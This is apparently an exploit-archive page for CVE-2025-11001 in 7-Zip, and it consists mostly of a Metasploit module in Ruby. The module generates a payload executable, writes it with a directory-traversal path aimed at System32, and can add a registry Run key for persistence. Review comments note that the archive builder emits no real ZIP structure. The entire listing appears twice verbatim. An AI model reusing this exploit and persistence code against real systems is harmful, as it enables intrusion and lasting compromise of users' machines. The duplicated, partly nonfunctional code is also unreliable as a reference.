7.8
/ 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Description
This Metasploit local Windows exploit module targets a directory traversal vulnerability in 7-Zip versions prior to 25.00 that can be abused through a malicious ZIP archive to achieve arbitrary code execution when the archive is extracted...
Basic Information
ID
PACKETSTORM:219338
Published
Apr 21, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : 7-Zip Directory Traversal Leading to RCE (Metasploit Local Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.7-zip.org |
==================================================================================================================================
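[+] Summary : This Metasploit local exploit module for Windows targets CVE-2025-11001, a directory traversal vulnerability in 7-Zip versions before 25.00 that can be abused through a malicious ZIP archive
to achieve arbitrary code execution when the archive is extracted. Note that the archive builder in the listing below writes a literal placeholder header rather than ZIP structures, so the file it produces is not a parseable archive; 7-Zip 25.00 and later fall outside the affected range stated here.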
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
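# Metasploit local module published as a proof of concept for CVE-2025-11001,
# which its author describes as a directory traversal in 7-Zip before 25.00.
#
# What the code in this file does:
# * #check reads the file version of 7z.exe and compares the major number
#   with 25.
# * #exploit writes a file through #build_malicious_zip and records it as
#   loot. That file is a literal marker string followed by the payload name,
#   the payload bytes and a path string. No ZIP local-file header, central
#   directory or link entry is emitted, so the output is not a parseable
#   archive.
# * The SYMLINK_NAME and CLEANUP options are registered but never read.
#
# For triage: the file this listing produces is not a sample of the real
# archive format, so it is not a basis for detection signatures. The version
# comparison in #check is the part that maps to the stated fix (25.00).
class MetasploitModule < Msf::Exploit::Local
  # NOTE(review): the rank is the author's own claim. #exploit itself warns
  # that a user has to extract the file, and nothing in this file
  # demonstrates reliability.
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Registry
  include Msf::Exploit::EXE

  # Registers module metadata and the datastore options.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '7-Zip Directory Traversal to RCE via Malicious ZIP (CVE-2025-11001)',
        'Description' => %q{
This module exploits a directory traversal vulnerability in 7-Zip versions
prior to 25.00.
},
        'License' => MSF_LICENSE,
        'Author' => [
          # The published listing had a stray ")" after the name.
          'indoushka'
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64, ARCH_X86],
        'Targets' => [
          [
            'Windows (Payload Execution)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_payload
            }
          ]
        ],
        'DefaultTarget' => 0
      )
    )

    # SYMLINK_NAME is registered here but no method in this file reads it.
    register_options([
      OptPath.new('PAYLOAD_FILE', [false, 'Custom payload file to embed (optional)', nil]),
      OptString.new('TARGET_PATH', [true, 'Target directory for payload extraction', 'C:\\Windows\\System32']),
      OptString.new('ZIP_FILENAME', [false, 'Output ZIP filename', 'CVE-2025-11001-exploit.zip']),
      OptString.new('SYMLINK_NAME', [false, 'Symlink entry name', 'evil.lnk'])
    ])

    # CLEANUP is registered here but no method in this file reads it.
    register_advanced_options([
      OptBool.new('CLEANUP', [true, 'Attempt to delete payload after execution', true]),
      OptBool.new('PERSISTENCE', [false, 'Establish persistence via registry run key', false])
    ])
  end

  # Looks for 7z.exe in the two Program Files locations and classifies the
  # installation by the major number of its file version.
  #
  # @return [Exploit::CheckCode] Vulnerable when the major version is below
  #   25, Safe when it is 25 or higher, Unknown when no 7z.exe with a
  #   readable version was found
  def check
    print_status("Checking if target has vulnerable 7-Zip version...")

    # NOTE(review): ENV is the environment of the Ruby process running this
    # module. file_exist? presumably queries the session host, in which case
    # these paths are built from the wrong machine's variables - confirm.
    candidates = [
      "#{ENV['PROGRAMFILES']}\\7-Zip\\7z.exe",
      "#{ENV['PROGRAMFILES(X86)']}\\7-Zip\\7z.exe"
    ]

    candidates.each do |path|
      next unless file_exist?(path)

      # NOTE(review): get_file_version is not defined in this file; presumably
      # it comes from an included mixin and returns a dotted string - confirm.
      version = get_file_version(path)
      next unless version

      # A value with no leading number proves nothing either way, so it must
      # not be reported as Vulnerable or as Safe.
      next if major_version(version).nil?

      if vulnerable_version?(version)
        print_good("Found vulnerable 7-Zip version: #{version}")
        return Exploit::CheckCode::Vulnerable
      else
        print_status("Found patched 7-Zip version: #{version}")
        return Exploit::CheckCode::Safe
      end
    end

    Exploit::CheckCode::Unknown
  end

  # Writes the output file, stores a copy as loot and optionally calls
  # #setup_persistence. Nothing in this method sends the file anywhere or
  # triggers extraction; the printed warning states that a user has to
  # extract it.
  #
  # @return [void]
  def exploit
    print_status("Generating malicious ZIP archive for CVE-2025-11001")

    payload_path = get_payload_path
    fail_with(Failure::BadConfig, "Payload not found") unless File.exist?(payload_path)

    zip_path = build_malicious_zip(payload_path)
    fail_with(Failure::UnexpectedReply, "ZIP creation failed") unless zip_path && File.exist?(zip_path)

    print_good("Malicious ZIP created: #{zip_path}")

    store_loot(
      '7zip.malicious.zip',
      'application/zip',
      rhost,
      # Binary read: the file holds executable bytes, and a text-mode read
      # can alter them on platforms that translate line endings.
      File.binread(zip_path),
      File.basename(zip_path),
      'Malicious ZIP archive'
    )

    print_warning("[*] Requires victim interaction to extract ZIP as Administrator")
    setup_persistence(payload_path) if datastore['PERSISTENCE']
    print_good("[+] Exploit ready for delivery")
  end

  # Delegates to the parent implementation when there is one.
  #
  # Defined above the `private` marker: in the published listing it sat below
  # it, which makes an override of an inherited method private and breaks any
  # call that names the receiver explicitly.
  #
  # @return [void]
  def cleanup
    super if defined?(super)
  end

  private

  # Returns the path of the payload file to embed.
  #
  # Uses PAYLOAD_FILE when it is set and non-empty. Otherwise it generates an
  # executable with generate_payload_exe, writes it under Dir.tmpdir with a
  # random eight-letter name and registers that path for cleanup.
  #
  # @return [String] path of the payload file
  def get_payload_path
    custom = datastore['PAYLOAD_FILE']
    return custom if custom && !custom.empty?

    exe_bytes = generate_payload_exe
    temp_path = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.exe"
    File.binwrite(temp_path, exe_bytes)
    register_file_for_cleanup(temp_path)
    temp_path
  end

  # Extracts the leading integer of a version value.
  #
  # @param version [Object] version as returned by get_file_version
  # @return [Integer, nil] the major number, or nil when the value does not
  #   start with digits (nil, an empty string, a non-string object)
  def major_version(version)
    digits = version.to_s[/\A\s*(\d+)/, 1]
    digits ? digits.to_i : nil
  end

  # Tells whether a version falls in the affected range stated in the module
  # description (before 25.00), judged by the major number alone.
  #
  # A value that cannot be parsed yields false. The published listing used
  # String#to_i, which turns any non-numeric string into 0 and therefore
  # reported it as vulnerable.
  #
  # @param version [Object] version as returned by get_file_version
  # @return [Boolean] true when the major number is below 25
  def vulnerable_version?(version)
    major = major_version(version)
    !major.nil? && major < 25
  end

  # Writes the output file and returns its path.
  #
  # The file consists of the literal string "ZIP-MOCK-HEADER", the payload
  # file name, the payload bytes and a "../../../../"-prefixed path string,
  # concatenated with no ZIP record structure around them. It is a
  # placeholder, not an archive.
  #
  # @param payload_file [String] path of the file whose bytes are embedded
  # @return [String] path of the file written; placed under Dir.tmpdir unless
  #   ZIP_FILENAME contains a colon
  def build_malicious_zip(payload_file)
    output_zip = datastore['ZIP_FILENAME']
    # A colon is taken to mean a drive-qualified path that is used as given.
    output_zip = File.join(Dir.tmpdir, output_zip) unless output_zip.include?(':')

    payload_data = File.binread(payload_file)
    payload_name = File.basename(payload_file)
    target_path = datastore['TARGET_PATH'].gsub('\\', '/')
    traversal = "../../../../#{target_path}"

    File.open(output_zip, 'wb') do |f|
      f.write("ZIP-MOCK-HEADER")
      f.write(payload_name)
      f.write(payload_data)
      f.write(traversal)
    end

    output_zip
  end

  # Runs when the PERSISTENCE option is set.
  #
  # Calls copy_file toward a randomly named .exe path built from the APPDATA
  # variable; only when that call returns a falsy value does it write a
  # REG_SZ value with a random name under the HKCU Run key. New executables
  # under the user's AppData directory and new values under that Run key are
  # the artefacts to audit for this behaviour.
  #
  # @param payload_path [String] path of the payload file
  # @return [void]
  def setup_persistence(payload_path)
    print_status("Setting persistence...")

    # NOTE(review): ENV is read from the process running this module - see
    # the same remark in #check.
    persist_path = "#{ENV['APPDATA']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

    if copy_file(payload_path, persist_path)
      print_good("Copied to startup location")
    else
      registry_key = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
      value_name = Rex::Text.rand_text_alpha(8)
      registry_setvaldata(registry_key, value_name, persist_path, 'REG_SZ')
    end
  end
end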
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : 7-Zip Directory Traversal Leading to RCE (Metasploit Local Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.7-zip.org |
==================================================================================================================================
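[+] Summary : This Metasploit local exploit module for Windows targets CVE-2025-11001, a directory traversal vulnerability in 7-Zip versions before 25.00 that can be abused through a malicious ZIP archive
to achieve arbitrary code execution when the archive is extracted. Note that the archive builder in the listing below writes a literal placeholder header rather than ZIP structures, so the file it produces is not a parseable archive; 7-Zip 25.00 and later fall outside the affected range stated here.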
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
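# Metasploit local module published as a proof of concept for CVE-2025-11001,
# which its author describes as a directory traversal in 7-Zip before 25.00.
#
# What the code in this file does:
# * #check reads the file version of 7z.exe and compares the major number
#   with 25.
# * #exploit writes a file through #build_malicious_zip and records it as
#   loot. That file is a literal marker string followed by the payload name,
#   the payload bytes and a path string. No ZIP local-file header, central
#   directory or link entry is emitted, so the output is not a parseable
#   archive.
# * The SYMLINK_NAME and CLEANUP options are registered but never read.
#
# For triage: the file this listing produces is not a sample of the real
# archive format, so it is not a basis for detection signatures. The version
# comparison in #check is the part that maps to the stated fix (25.00).
class MetasploitModule < Msf::Exploit::Local
  # NOTE(review): the rank is the author's own claim. #exploit itself warns
  # that a user has to extract the file, and nothing in this file
  # demonstrates reliability.
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Registry
  include Msf::Exploit::EXE

  # Registers module metadata and the datastore options.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '7-Zip Directory Traversal to RCE via Malicious ZIP (CVE-2025-11001)',
        'Description' => %q{
This module exploits a directory traversal vulnerability in 7-Zip versions
prior to 25.00.
},
        'License' => MSF_LICENSE,
        'Author' => [
          # The published listing had a stray ")" after the name.
          'indoushka'
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64, ARCH_X86],
        'Targets' => [
          [
            'Windows (Payload Execution)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_payload
            }
          ]
        ],
        'DefaultTarget' => 0
      )
    )

    # SYMLINK_NAME is registered here but no method in this file reads it.
    register_options([
      OptPath.new('PAYLOAD_FILE', [false, 'Custom payload file to embed (optional)', nil]),
      OptString.new('TARGET_PATH', [true, 'Target directory for payload extraction', 'C:\\Windows\\System32']),
      OptString.new('ZIP_FILENAME', [false, 'Output ZIP filename', 'CVE-2025-11001-exploit.zip']),
      OptString.new('SYMLINK_NAME', [false, 'Symlink entry name', 'evil.lnk'])
    ])

    # CLEANUP is registered here but no method in this file reads it.
    register_advanced_options([
      OptBool.new('CLEANUP', [true, 'Attempt to delete payload after execution', true]),
      OptBool.new('PERSISTENCE', [false, 'Establish persistence via registry run key', false])
    ])
  end

  # Looks for 7z.exe in the two Program Files locations and classifies the
  # installation by the major number of its file version.
  #
  # @return [Exploit::CheckCode] Vulnerable when the major version is below
  #   25, Safe when it is 25 or higher, Unknown when no 7z.exe with a
  #   readable version was found
  def check
    print_status("Checking if target has vulnerable 7-Zip version...")

    # NOTE(review): ENV is the environment of the Ruby process running this
    # module. file_exist? presumably queries the session host, in which case
    # these paths are built from the wrong machine's variables - confirm.
    candidates = [
      "#{ENV['PROGRAMFILES']}\\7-Zip\\7z.exe",
      "#{ENV['PROGRAMFILES(X86)']}\\7-Zip\\7z.exe"
    ]

    candidates.each do |path|
      next unless file_exist?(path)

      # NOTE(review): get_file_version is not defined in this file; presumably
      # it comes from an included mixin and returns a dotted string - confirm.
      version = get_file_version(path)
      next unless version

      # A value with no leading number proves nothing either way, so it must
      # not be reported as Vulnerable or as Safe.
      next if major_version(version).nil?

      if vulnerable_version?(version)
        print_good("Found vulnerable 7-Zip version: #{version}")
        return Exploit::CheckCode::Vulnerable
      else
        print_status("Found patched 7-Zip version: #{version}")
        return Exploit::CheckCode::Safe
      end
    end

    Exploit::CheckCode::Unknown
  end

  # Writes the output file, stores a copy as loot and optionally calls
  # #setup_persistence. Nothing in this method sends the file anywhere or
  # triggers extraction; the printed warning states that a user has to
  # extract it.
  #
  # @return [void]
  def exploit
    print_status("Generating malicious ZIP archive for CVE-2025-11001")

    payload_path = get_payload_path
    fail_with(Failure::BadConfig, "Payload not found") unless File.exist?(payload_path)

    zip_path = build_malicious_zip(payload_path)
    fail_with(Failure::UnexpectedReply, "ZIP creation failed") unless zip_path && File.exist?(zip_path)

    print_good("Malicious ZIP created: #{zip_path}")

    store_loot(
      '7zip.malicious.zip',
      'application/zip',
      rhost,
      # Binary read: the file holds executable bytes, and a text-mode read
      # can alter them on platforms that translate line endings.
      File.binread(zip_path),
      File.basename(zip_path),
      'Malicious ZIP archive'
    )

    print_warning("[*] Requires victim interaction to extract ZIP as Administrator")
    setup_persistence(payload_path) if datastore['PERSISTENCE']
    print_good("[+] Exploit ready for delivery")
  end

  # Delegates to the parent implementation when there is one.
  #
  # Defined above the `private` marker: in the published listing it sat below
  # it, which makes an override of an inherited method private and breaks any
  # call that names the receiver explicitly.
  #
  # @return [void]
  def cleanup
    super if defined?(super)
  end

  private

  # Returns the path of the payload file to embed.
  #
  # Uses PAYLOAD_FILE when it is set and non-empty. Otherwise it generates an
  # executable with generate_payload_exe, writes it under Dir.tmpdir with a
  # random eight-letter name and registers that path for cleanup.
  #
  # @return [String] path of the payload file
  def get_payload_path
    custom = datastore['PAYLOAD_FILE']
    return custom if custom && !custom.empty?

    exe_bytes = generate_payload_exe
    temp_path = "#{Dir.tmpdir}/#{Rex::Text.rand_text_alpha(8)}.exe"
    File.binwrite(temp_path, exe_bytes)
    register_file_for_cleanup(temp_path)
    temp_path
  end

  # Extracts the leading integer of a version value.
  #
  # @param version [Object] version as returned by get_file_version
  # @return [Integer, nil] the major number, or nil when the value does not
  #   start with digits (nil, an empty string, a non-string object)
  def major_version(version)
    digits = version.to_s[/\A\s*(\d+)/, 1]
    digits ? digits.to_i : nil
  end

  # Tells whether a version falls in the affected range stated in the module
  # description (before 25.00), judged by the major number alone.
  #
  # A value that cannot be parsed yields false. The published listing used
  # String#to_i, which turns any non-numeric string into 0 and therefore
  # reported it as vulnerable.
  #
  # @param version [Object] version as returned by get_file_version
  # @return [Boolean] true when the major number is below 25
  def vulnerable_version?(version)
    major = major_version(version)
    !major.nil? && major < 25
  end

  # Writes the output file and returns its path.
  #
  # The file consists of the literal string "ZIP-MOCK-HEADER", the payload
  # file name, the payload bytes and a "../../../../"-prefixed path string,
  # concatenated with no ZIP record structure around them. It is a
  # placeholder, not an archive.
  #
  # @param payload_file [String] path of the file whose bytes are embedded
  # @return [String] path of the file written; placed under Dir.tmpdir unless
  #   ZIP_FILENAME contains a colon
  def build_malicious_zip(payload_file)
    output_zip = datastore['ZIP_FILENAME']
    # A colon is taken to mean a drive-qualified path that is used as given.
    output_zip = File.join(Dir.tmpdir, output_zip) unless output_zip.include?(':')

    payload_data = File.binread(payload_file)
    payload_name = File.basename(payload_file)
    target_path = datastore['TARGET_PATH'].gsub('\\', '/')
    traversal = "../../../../#{target_path}"

    File.open(output_zip, 'wb') do |f|
      f.write("ZIP-MOCK-HEADER")
      f.write(payload_name)
      f.write(payload_data)
      f.write(traversal)
    end

    output_zip
  end

  # Runs when the PERSISTENCE option is set.
  #
  # Calls copy_file toward a randomly named .exe path built from the APPDATA
  # variable; only when that call returns a falsy value does it write a
  # REG_SZ value with a random name under the HKCU Run key. New executables
  # under the user's AppData directory and new values under that Run key are
  # the artefacts to audit for this behaviour.
  #
  # @param payload_path [String] path of the payload file
  # @return [void]
  def setup_persistence(payload_path)
    print_status("Setting persistence...")

    # NOTE(review): ENV is read from the process running this module - see
    # the same remark in #check.
    persist_path = "#{ENV['APPDATA']}\\#{Rex::Text.rand_text_alpha(8)}.exe"

    if copy_file(payload_path, persist_path)
      print_good("Copied to startup location")
    else
      registry_key = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
      value_name = Rex::Text.rand_text_alpha(8)
      registry_setvaldata(registry_key, value_name, persist_path, 'REG_SZ')
    end
  end
end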
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================